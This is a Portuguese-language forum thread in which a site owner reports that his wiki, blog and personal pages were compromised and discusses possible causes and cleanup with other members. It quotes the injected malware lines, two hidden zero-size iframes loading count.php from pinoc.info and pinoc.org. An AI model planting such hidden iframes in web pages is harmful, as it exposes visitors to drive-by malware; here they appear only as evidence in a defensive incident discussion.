• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

Knitter

pinoc.info, site vitima de hack?

15 mensagens neste tópico

Boas,

Deparei-me com um pequeno problema, hoje ao aceder à minha wiki para escrever umas coisitas, reparei que o endereço não funcionava. Inicialmente pensei que estivesse relacionado com um qualquer problema ocorrido na alteração de servidor, afinal, parece que o site foi alvo de hacking.

O index.php da wiki, bem como os ficheiros HTML da minha página pessoal, possuem um código que não foi colocado por mim.

Uma pequena pesquisa revelou este endereço a falar do assunto, http://forums.whirlpool.net.au/forum-replies-archive.cfm/1012714.html, não encontrei mais nada de especial sobre isto, alguém tem mais informações?

Além da minha página, pelo menos outro site tem o mesmo problema, curiosamente ambos criados por mim, mas são dois sistemas completamente diferentes, estou céptico em considerar a falha como minha, mas tenho de confirmar melhor.

Este é o código que se encontra nos ficheiros e que não devia lá estar:

<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

O teu wiki está com bugs agora... Que sistema usas? Não será uma falha de segurança que o sistema possa ter? Fala com o suporte do teu host e vê se eles te conseguem arranjar logs de ficheiros modificados e tal ou se possam dar mais alguma informação sobre isso. Pelo menos tenta averiguar se a mudança foi feita com acesso apenas ao wiki ou directamente pelo servidor.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Uma recomendação, ainda não resolvi o problema, dado que este se revelou mais extenso do que parecia, por isso evitem aceder ao site ;)

Uma vez que o sistema de wiki falha, não há problema em acederem a esse endereço, mas evitem aceder a outros, se usarem FF estão relativamente seguros, mas se usarem IE e não tiverem anti-virus e/ou popup-blocker, podem ter problemas.

Não faço ideia de que versão do IE era afectada mas sei que, se for o mesmo problema, o browser vai abaixo ao aceder ao site.

Dito isto, devo indicar que me parece difícil que seja um problema do sistema de wiki, o sistema que uso é o PMWiki. Isto porque, como indiquei, outros sites estão também afectados, que não usam wiki, são contas separadas, além de que o meu blog também foi afectado, que é Wordpress, e a página pessoal, que não tem qualquer sistema PHP tirando a página de contactos.

Os ficheiros do blog estão cheios desse código, os HTML da página de apresentação também, e da wiki, apenas a index.php tem.

Já tenho os logs de acesso mas não tenho nada que me dê informações, neste caso estou bastante às escuras, não sei bem onde procurar informação.

Para já estou a tratar de outros sites que foram afectados e que são prioritários.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Podes dizer-me o link de um dos sites afectados? Está tudo na mesma máquina?

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Posso dizer-te de um, da minha página pessoal, está no perfil, ou no que no meu tema se parece com um globozito verde. Sim, a única coisa em comum é estarem no mesmo servidor.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Isso é deveras suspeito, especialmente no servidor onde está. Algo me cheira que algum cliente da Trignosfera teve pouco cuidado no seu site e permitiu code injection ou tem falhas de RFI/LFI... ou então mais grave, alguém entrou por ssh, ou então alguém conseguiu furar as permissões do mysqld, mas deve ter sido a primeira opção. Em que ficheiros concretos tinhas isso? Vês alguma pattern (caixa de comentários, etc etc, file uploading, localização dos ficheiros)? Procura no access.log por algum trecho de código que aí postaste depois de passar por um urlencode(). Se encontrares, tens uma falha de XSS/code injection. Procura por possiveis endereços passados para um script, pode ser RFI. Vê se os uploads têm algum tipo de verificação antes de serem guardados, pode ser LFI. (Para veres os significados das signas, tens o meu sticky sobre vulnerabilidades na secção de PHP).

Como foi dito no link que postaste, isto provavelmente foi um bot que encontrou alguma falha num site alojado na máquina e injectou esse código, que vai reportar ao "site mãe" (o tal pinoc.info) a máquina vulnerável.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

O código estava em todos os ficheiros cujo nome se iniciasse por index, portanto nos index.html e index.php existentes.

Na minha wiki apenas o index.php foi afectado, foi o único ficheiro, no blog encontrei 41 ficheiros php infectados, no site pessoal, todos os ficheiros html tinham o código, apenas o ficheiro php de contactos não tinha. Este três sistemas são na mesma conta, são subdominios.

Além deste 3, uma wiki para outro projecto, que tenho alojado nesta conta temporariamente, e a usar dokuwiki, viu 31 ficheiros PHP infectados.

No outro site, uma outra conta, no mesmo servidor, dos ficheiros PHP, apenas o index.php foi afectado, mas todos os ficheiros HTML, alguns não são mais que pedaços a serem incluidos noutras páginas, como sejam noticias e menus, foram afectados mas, além do index.php, mais nenhum script foi.

Não percebo padrão nenhum, tirando o facto de todos os ficheiros HTML serem atacados.

Em todos os ficheiros afectados foi feita a adição das linhas que indiquei no início, nos ficheiros HTML, o texto está mesmo depois da marca de fecho de HTML, pelo que me parece que aos ficheiros não foi feito mais que um append.

Vou ver se os logs me dizem alguma coisa, neste momento estou a acabar de configurar o meu blog, já removi todos os ficheiro infectados e alterei todas as passwords que tinha, vou ver se existe mais alguma coisa que possa fazer. Já contactei um dos elementos da empresa de alojamento, ainda que apenas por MSN, mas não obtive resposta, vou enviar mensagem por mail e ver se aí já me respondem. Gostaria de saber se realmente é falha de servidor, logo se vê.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Ou as permissões do Apache estão muito m*rdosas, ou então entraram-lhes por SSH no servidor. Mais só posso dizer tendo acesso ao servidor. ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

OK, muito ingénuo sou eu, lá está, na minha ignorância pensei que as estatísticas do site estariam fora de qualquer suspeita, devia ter feito um search melhor, tenho os HTMLs dos sistemas e estatísticas todos afectados ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Yap, neste caso do webalizer, ainda bem que nunca gostei muito do dito programa e não me custa nada mandar as estatísticas pelo cano, pelo menos os ficheiros HTML, mas que raio.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Eu há uns tempo atrás tive um problema no meu blog...

Ainda pensei em ver os logs para tentar descobrir que passava, mas nas datas em que eu os queria ver, havia falhas.

Na fiquei na dúvida se o problema seria estar a usar uma versão desactualizada do WP, ou ser era mais grave. De qualquer forma, depois da actualização de software, o problema ficou resolvido.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

A versão que estava a usar é a mais actualizada, tanto do blog, como das duas wikis.

Parece que o problema se deve a um exploit no PHP/Perl, ainda está por se descobrir concretamente, e que afectou vários clientes, embora não tenha afectado todos os clientes da máquina, de qualquer maneira parece que não existe uma solução 100% para o problema, pelo que apenas me resta remover o conteúdo malicioso e estar atento a qualquer alteração.

Sou capaz de desenferrujar o meu perl e tentar criar um sistema que me informe, por mail, se existiram alterações a ficheiros.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora